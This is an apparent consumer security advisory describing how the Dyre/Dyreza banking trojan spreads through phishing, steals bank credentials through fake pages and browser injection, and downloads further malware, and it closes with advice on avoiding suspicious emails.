After the takedowns that law-enforcement agencies performed on Botnet infrastructure this year, as well as in 2014, Dyre/Dureza became one of the more prominent attackers.
This infection uses phishing emails to distribute itself to various computers. The email will contain the Upatre download Trojan. If users download and run it, their system will immediately be infected.
How Does the Infection Work?
There are a couple of things that this infection can do once it makes its way onto your system. It can redirect you to a fake web page that mimics the one of the bank you are a client of. When you enter your credentials, they will be sent to the infection’s creators. It can also insert code into legitimate web pages, and get any credentials that you input on that web page that way. This is achieved with the help of Man-in-the-Browser attacks, which can be executed on the three most popular Windows browsers: Internet Explorer, Google Chrome, and Mozilla Firefox.
The main targets of this infection are banking and other financial institutions located in the US, the UK, as well as other English-speaking countries. Recently, however, its range has widened to Canada, as well as some non-English speaking countries, increasing the scope of its potential victims. There have also been reports that it attacks online payment services and digital currency users.
Curiously enough, there have been little to no attacks anywhere in Eastern Europe.
This suggests that the attackers are located there, and do not want to have business with any law-enforcement. Another thing that supports this theory is the time when the Dyre group is active. It seems to coincide with a five-day work schedule in the countries located in Eastern Europe and the Russia Federation. Also, it seems that most of its command-and-control is located in the region.
What Malware Can be Downloaded by Dyre?
Besides, the activities that we have mentioned, Dyre can also download more malware onto your system. These are known to steal other information and credentials, target wallet.dat files, as well as using your PC’s resources for DDoS attacks and brute-force attacks against FTP hosts. This will definitely have a visible impact on your PC’s performance, so it can be a warning light that the PC is infected.
Additionally, it has also been reported that Dyre/Dyreza has also targeted career and HR websites.
This is most likely to steal information such as names and email address, so that its creators can sell them or send phishing emails to infect computers.
It goes without saying, that this infection is no joke. So you must be especially careful what emails you open and be suspicious of the links presented in them. Even if the email you have received seems to be sent by someone you know, carefully check the email address before deciding whether it is trustworthy or not. It has been reported that Dyre can compromise Microsoft Outlook. So if anyone is infected by it, they can send the phishing email containing the Trojan to all of their contacts.